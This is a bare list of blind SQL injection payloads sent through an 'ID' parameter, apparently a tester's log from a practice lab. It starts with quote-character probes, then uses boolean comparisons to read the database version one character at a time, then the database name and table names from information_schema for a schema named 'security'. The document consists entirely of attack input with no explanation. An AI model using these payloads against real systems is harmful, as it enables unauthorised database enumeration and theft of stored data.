ID:1
ID:1'
ID:1"
ID:1' and (select substr(version(),1,1))<6-- 
ID:1' and (select substr(version(),1,1))<5-- 
ID:1' and (select substr(version(),1,1))<8-- 
ID:1' and (select substr(version(),1,1))<7-- 
ID:1' and (select substr(version(),1,1))<9-- 
ID:1' and (select substr(version(),1,1))=1-- 
ID:1' and (select substr(version(),1,1))=1-- 
ID:1' and (select substr(version(),1,1))=1-- 
ID:1' and (select substr(version(),1,1))<6-- 
ID:1'
ID:1' and (select substr(version(),1,1))<6-- 
ID:1' and (select substr(version(),1,1))<11-- 
ID:1' and (select substr(version(),1,1))>11-- 
ID:1' and (select substr(version(),1,1))=11-- 
ID:1' and (select substr(version(),1,1))=1-- 
ID:1' and (select substr(version(),1,1))=1-- 
ID:1' and (select substr(version(),1,1))=2-- 
ID:1' and (select substr(version(),1,1))=2-- 
ID:1' and (select substr(version(),1,1))>1-- 
ID:1' and (select substr(version(),1,1))<1-- 
ID:1' and (select substr(version(),1,1))<2-- 
ID:1' and (select substr(version(),1,1))<2-- 
ID:1' and (select substr(version(),1,1))<6-- 
ID:1' and (select substr(version(),1,1))< 6-- 
ID:1' and (select substr(version(),1,1))< 1-- 
ID:1' and (select substr(version(),1,1))= 1-- 
ID:1' and (select substr(version(),2,1))= 1-- 
ID:1' and (select substr(version(),2,1))= 0-- 
ID:1(ascii(substr(version(),2,1))=ascii('.'))-- 
ID:1(ascii(substr(version(),3,1))=ascii('.'))-- 
ID:1 and (ascii(substr(version(),3,1))=ascii('.'))-- 
ID:1' and (ascii(substr(version(),3,1))=ascii('.'))-- 
ID:1' and (ascii(substr(version(),2,1))=ascii('.'))-- 
ID:1' AND (ascii(substr(database(),1,1))=ascii('f'))-- 
ID:1' AND (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))=ascii('e'))-- 
ID:1' AND (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))=ascii('k'))-- 
ID:1' AND (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))=ascii('k'))-- 
ID:1' and (ascii(substr(version(),2,1))=ascii('.'))-- 
ID:1' and (ascii(substr(version(),3,1))=ascii('.'))-- 
ID:1 and (ascii(substr(version(),3,1))=ascii('.'))-- 
